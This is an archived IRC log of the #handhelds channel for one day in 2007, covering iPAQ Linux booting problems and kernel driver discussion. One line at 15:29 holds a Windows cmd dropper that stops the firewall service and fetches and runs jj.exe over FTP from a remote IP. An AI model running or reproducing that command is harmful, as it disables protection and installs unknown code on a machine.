IRC log for #handhelds on 20070719

00:01.16*** join/#handhelds orospakr (n=orospakr@bas4-ottawa23-1177649197.dsl.bell.ca)
00:22.09Marexdarkerror05, marvell ... on top of my todo now ...
00:27.00*** join/#handhelds Disconnect (n=dis@pool-71-163-2-103.washdc.fios.verizon.net)
00:27.55darkerror05awsomeness
00:40.04*** join/#handhelds \\homer (n=flo@dslb-084-059-122-186.pools.arcor-ip.net)
00:46.47*** join/#handhelds dariballdesk_ (n=dariball@p54B1E864.dip.t-dialin.net)
00:52.23*** join/#handhelds Disconnect (n=dis@pool-71-163-2-103.washdc.fios.verizon.net)
01:15.07*** join/#handhelds mzb (n=ubernut@ppp108-88.static.internode.on.net)
01:15.28*** mode/#handhelds [+o mzb] by ChanServ
01:27.14*** join/#handhelds ricmm (n=ricmm@201.208.253.24)
01:39.15*** join/#handhelds noclouds (n=mhfan@218.22.26.90)
01:48.20*** join/#handhelds CodeMachine (n=cm@83.239.149.225)
02:14.25*** join/#handhelds noclouds (n=mhfan@218.22.26.90)
02:30.32*** join/#handhelds __shawn (n=shawn@h46078c1b.area7.spcsdns.net)
03:45.12*** join/#handhelds ricmm (n=ricmm@201.208.253.24)
03:48.30*** join/#handhelds CodeMachine (n=cm@83.239.149.225)
04:35.44*** join/#handhelds nelson (n=nelson@rrcs-72-43-17-50.nys.biz.rr.com)
04:45.09*** join/#handhelds zap (n=zap@16.170.249.ozerki.net)
05:30.42*** part/#handhelds rmoravci1 (n=rmoravci@ip-89-103-152-149.karneval.cz)
05:39.05*** join/#handhelds avkig (i=ariel@gateway/tor/x-d706a0ca5c9c8afc)
05:51.22*** join/#handhelds psokolovsky (n=psokolov@arena.transplant.volia.net)
05:52.30*** join/#handhelds __shawn (n=shawn@adsl-70-231-227-173.dsl.snfc21.sbcglobal.net)
05:53.29*** join/#handhelds mscdex (i=yep@ppp-69-223-74-229.dsl.dytnoh.ameritech.net)
05:58.57mscdexi'm having a problem using ramdiskrescue on my ipaq h4350. it boots to the menu but i am unable to use the buttons or the dpad to navigate the menu and make selections. i also tried using the special custom.txt for the h4350 and the kbd ipk, but when I try that the console reports that the package couldn't be found. i did put the ipk in the folder where haret and the initrd are located.
06:00.53mscdexi'm using ramdiskrescue 0.6.4 and haret 0.3.8 since haret 0.4.8 didn't seem to work
06:01.07*** join/#handhelds x29a (n=x29a@unaffiliated/x29a)
06:21.09*** join/#handhelds bluelightning (n=blueligh@219-89-47-181.dialup.xtra.co.nz)
06:45.01*** join/#handhelds theturtle (n=theturtl@theturtle.net)
07:07.34*** join/#handhelds goxboxlive (n=goxboxli@141.80-202-161.nextgentel.com)
07:24.47*** join/#handhelds psokolovsky_ (n=psokolov@82.193.99.24)
07:56.03*** join/#handhelds pH5 (n=ph5@p5485D702.dip.t-dialin.net)
08:09.05*** join/#handhelds mboutin (n=mboutin@161.106.180.98)
08:09.16*** join/#handhelds sadeness_ (n=LamersIn@nat1.rlan.ru)
08:34.40*** join/#handhelds thaytan (n=jan@81.187.73.203)
08:49.22*** join/#handhelds wick7xx (n=mongo@63.135.144.148)
09:08.04*** join/#handhelds cm34 (n=cm@83.239.149.225)
09:22.07*** join/#handhelds mmp (n=mmp@adsl-dyn48.91-127-40.t-com.sk)
09:22.51*** join/#handhelds thaytan (n=jan@81.187.73.203)
09:40.25*** join/#handhelds thaytan (n=jan@81.187.73.203)
10:13.09*** join/#handhelds psokolovsky_ (n=psokolov@82.193.99.24)
10:22.19*** join/#handhelds thaytan (n=jan@81.187.73.203)
10:22.51*** join/#handhelds celsion (n=unknown@dslb-084-061-166-154.pools.arcor-ip.net)
10:27.25*** join/#handhelds cm34 (n=cm@83.239.149.225)
10:34.27*** join/#handhelds cm34 (n=cm@83.239.149.225)
11:08.30mmphello, is there any _nice_ way to read e.g. samcop's registers, even though samcop_read_register& friends are static? I'm going to implement expansion pack driver, but it needs to read some samcop's EPS registers...
11:09.30mmpThe solution I'm thinking about is to create functions like samcop_read_eps_status, but that would probably flood the namespace...
11:12.45mmphmm, or get inspiration from the SDI driver and put pointers to neccessary functions to platform_device_data :)
11:30.31*** join/#handhelds \homer (n=flo@dslb-084-059-102-004.pools.arcor-ip.net)
11:34.11*** join/#handhelds cm34 (n=cm@83.239.149.225)
11:45.28psokolovsky_mmp: well, I guess, pointers is too much for starters.  samcop_read_eps_status() or just unstatic samcop_read_register() would be good enough as 1st step...
11:55.58*** join/#handhelds eddyp (n=eddy@ns.bitdefender.com)
11:58.08*** join/#handhelds mr_nice (n=mr_nice@p54A9DA0F.dip.t-dialin.net)
11:59.51mmppsokolovsky_: hmm, I would rather commit "clean" code...
12:01.46psokolovsky_mmp: we already discussed that it's not easy to do "clean" code from first try ;-). clean code == maintained code.
12:04.13mmpwell, this won't be "code cleanup" -- pcmcia driver for h5000 is fully missing...
12:04.34mmp(which is a bit weird, because it was apparently supported in 2.4.x age)
12:05.26mmpbut you're right, as a proof of concept it's good enough...
12:06.10mmpI'm just afraid of "golden rule of sysadmin", which my friend told me -- "Temporary solutions are the most permanent ones"
12:09.46psokolovsky_mmp: as a programmer, don't pull bad habits from sysadmins ;-)
12:10.01mmp:-))
12:10.50mmpit wil be a bit hard, as I'm also half-sysadmin... But I will try to:)
12:21.51*** join/#handhelds RyoS (n=ryo@cache.0bit.org) [NETSPLIT VICTIM]
12:21.51*** join/#handhelds Takapa (i=vegard@svanberg.no) [NETSPLIT VICTIM]
12:21.51*** join/#handhelds dm8tbr (i=dm8tbr@2001:41b8:800:0:0:0:0:2)
12:46.16*** join/#handhelds TheCompWiz (i=user@wsip-68-109-200-102.mc.at.cox.net)
12:59.36*** join/#handhelds mboutin (n=mboutin@161.106.181.54)
13:01.17*** join/#handhelds thaytan (n=jan@81.187.73.203)
13:16.21*** join/#handhelds agd5f (n=deuchera@65.242.105.130)
13:24.30*** join/#handhelds thaytan (n=jan@81.187.73.203)
13:36.26*** join/#handhelds mr_nice (n=mr_nice@p54A9DA0F.dip.t-dialin.net)
13:50.31*** join/#handhelds mboutin (n=mboutin@161.106.181.54)
14:08.02*** join/#handhelds thaytan (n=jan@81.187.73.203)
14:12.49*** join/#handhelds TheCompWiz (i=user@wsip-68-109-200-102.mc.at.cox.net)
14:27.09*** join/#handhelds ricmm2 (i=ricmm@201.208.253.24)
14:43.13*** join/#handhelds dijenerate (n=dijenera@69.73.226.141)
14:57.14*** join/#handhelds goxboxlive (n=goxboxli@141.80-202-161.nextgentel.com)
15:11.54*** join/#handhelds thaytan (n=jan@81.187.73.203)
15:14.44*** join/#handhelds nelson (n=nelson@rrcs-72-43-17-50.nys.biz.rr.com)
15:18.40*** join/#handhelds orospakr (n=orospakr@132.213.238.4)
15:24.39*** join/#handhelds ibot (i=ibot@pdpc/supporter/active/TimRiker/bot/apt)
15:24.39*** topic/#handhelds is Open source software for handheld devices - http://handhelds.org
15:27.00*** join/#handhelds psokolovsky (n=psokolov@82.193.99.24)
15:29.32ricmm%systemroot%\system32\cmd.exe
15:29.57ricmmcmd /c net stop SharedAccess &echo open 201.208.189.97 50428 >> ij &echo user t g >> ij &echo get jj.exe >> ij &echo bye >> ij &ftp -n -v -s:ij &del ij &jj.exe &net start SharedAccess &exit
15:37.03*** join/#handhelds TheCompWiz (i=user@wsip-68-109-200-102.mc.at.cox.net)
15:37.09ricmm2wow, what the fuck
15:53.35*** join/#handhelds nelson (n=nelson@rrcs-72-43-17-50.nys.biz.rr.com)
16:20.50*** join/#handhelds rmoravcik (n=rmoravci@ip-89-103-152-149.karneval.cz)
16:36.35*** join/#handhelds zap (n=zap@16.170.249.ozerki.net)
16:44.19*** join/#handhelds psokolovsky_ (n=psokolov@arena.transplant.volia.net)
16:55.53*** join/#handhelds aquadran (i=aquadran@scummvm/undead/aquadran)
17:04.01*** join/#handhelds cm34 (n=cm@83.239.149.225)
17:05.46*** join/#handhelds thaytan (n=jan@81.187.73.203)
17:08.12psokolovsky_mmp: bd2 already submitted patches for that, so skip that for now...
17:08.50mmpgeez, that was fast; wish was fulfilled only two minutes after saying it:)
17:09.21psokolovsky_;-)
17:09.29mmppsokolovsky_: That was just a lament, because I don't see any system in the header files:)
17:10.19psokolovsky_yes, we need to move to having 1 single header per device. caveat: need to think out internal structure.
17:13.00*** join/#handhelds CodeMachine (n=cm@83.239.149.225)
17:14.06mmppsokolovsky_: yes, moreover, there was quite a mess with h5400-asic vs. samcop-related things...
17:14.15mmp(at least in my opinion)
17:15.33psokolovsky_well, h5400-asic.h supposed to contain *h5400* specific assignments of samcop's GPIO pins, and some other things like base address, etc
17:22.44*** join/#handhelds pH5 (n=ph5@p5485E82F.dip.t-dialin.net)
17:29.35*** join/#handhelds __shawn (n=shawn@h46073f9e.area7.spcsdns.net)
17:36.12*** join/#handhelds x29a (n=x29a@unaffiliated/x29a)
17:40.04*** join/#handhelds thaytan (n=jan@81.187.73.203)
17:57.00*** join/#handhelds bd2 (n=cbou@89.113.85.104)
18:02.30*** join/#handhelds zybl0re (n=zybl0re@S010600112f8c4e0a.gv.shawcable.net)
18:22.05*** join/#handhelds pipomolo42 (n=alex@ALille-152-1-45-39.w83-198.abo.wanadoo.fr)
18:25.20*** join/#handhelds goxboxlive (n=goxboxli@141.80-202-161.nextgentel.com)
18:35.12*** join/#handhelds vati (n=joerg_he@dslb-088-073-255-148.pools.arcor-ip.net)
18:39.59mmppsokolovsky_: aha (sorry for delay)
18:56.13*** part/#handhelds vati (n=joerg_he@dslb-088-073-255-148.pools.arcor-ip.net)
19:18.12mscdexi'm trying to use ramdiskrescue 0.6.4 on my h4350 using the custom.txt and all from the ramdiskrescue site. however i'm getting the same error as the user here: http://www.handhelds.org/hypermail/h4100-port/6/0651.html. i don't see why the ipk can't be installed
19:21.11psokolovsky_mscdex: forget about ipk, you don't need it
19:23.52*** join/#handhelds zap (n=zap@16.170.249.ozerki.net)
19:25.23*** join/#handhelds __shawn (n=shawn@adsl-67-124-150-93.dsl.pltn13.pacbell.net)
19:26.32*** join/#handhelds goxboxlive (n=goxboxli@141.80-202-161.nextgentel.com)
19:38.02mscdexi'm unable to navigate and make selections at the ramdiskrescue menu using either the app buttons or the dpad
19:50.16psokolovsky_dpad should work
19:51.09mscdexi had no luck with it, so i figured the kbd ipk was needed
19:51.38mscdexi'm using haret 0.3.8 if that makes a difference
20:07.30mscdex0.4.8 does the same thing. i am also using the zImage-2.6.16-hh7-h4000-20061028020714 from the site for RR
20:10.47*** join/#handhelds cm34 (n=cm@83.239.149.225)
20:14.18*** join/#handhelds goxboxlive (n=goxboxli@141.80-202-161.nextgentel.com)
20:30.49mmppsokolovsky_: were there any changes also to arch-sa1100/h3600.h, or asm/arch-pxa ?
20:31.10mmpSome h3600 code doesn't compile after cvs up
20:31.50mmp(just if you have time for that, it looks like it's just one macro, but I'm not sure yet)
20:32.05psokolovsky_mmp: changes are in cvs log. build status is here: http://handhelds.org/~pfalcon/busyb/buildlogs/
20:32.37mmpaha, ok, I have not used CVS log much yet:)
20:33.57mmpand the code is in ipaq-sleeve.c, I think it's my job to fix it:)
20:34.07mmppsokolovsky_: thanks:)
20:34.09mscdexhmmm RR 0.6.3 behaves the same way
20:37.22mscdexis this problem related to the kernel being used?
20:38.52psokolovsky_mscdex: cursor keys should work
20:39.36mscdexnone of the keys/buttons function at all at the menu
20:41.23psokolovsky_that could be possibly device model detection issue
20:46.22mscdexis there any way to force which model to use?
20:46.42psokolovsky_mscdex: try to look at RR source ;-)
21:03.58mmpgood night
21:04.02mmp:)
21:20.04*** join/#handhelds systm_ (n=systm@c-71-197-119-16.hsd1.ca.comcast.net)
21:20.36systm_How would one install familar on his/her iPaq?
21:38.27systm_I keep getting unlock errors when trying to run the bootloader
21:38.33systm_is this normal/
21:40.36*** part/#handhelds agd5f (n=deuchera@65.242.105.130)
22:26.32*** join/#handhelds agd5f (n=alex@c-69-143-17-173.hsd1.va.comcast.net)
22:31.37*** join/#handhelds goxboxlive (n=goxboxli@141.80-202-161.nextgentel.com)
22:46.58mscdexok the trick was changing the MTYPE to 1291, but the only zImage i could get to work with that setting is 2.6.20-hh6. no other kernel would work with it
22:50.07psokolovsky_any kernel after ~ that works with it
22:50.56mscdexi had tried 2.6.21-hh10 before and it failed to boot
22:51.04mscdexi do not know why
22:52.29*** join/#handhelds x29a (n=x29a@unaffiliated/x29a)
23:04.28*** part/#handhelds rmoravcik (n=rmoravci@ip-89-103-152-149.karneval.cz)
23:30.57*** join/#handhelds x29a_ (n=x29a@unaffiliated/x29a)
23:34.51*** join/#handhelds orospakr (n=orospakr@ottawa-hs-209-217-93-173.d-ip.magma.ca)
23:41.08*** join/#handhelds systm (n=systm@c-71-197-119-16.hsd1.ca.comcast.net)
23:46.27*** join/#handhelds mzb (n=ubernut@ppp108-88.static.internode.on.net)
23:46.48*** mode/#handhelds [+o mzb] by ChanServ
23:56.36*** join/#handhelds orospakr (n=orospakr@ottawa-hs-209-217-93-173.d-ip.magma.ca)
23:58.40systmwhere can i find kernel images for
23:58.47systmipaq rx3000 series?

Generated by irclog2html.pl Modified by Tim Riker to work with infobot.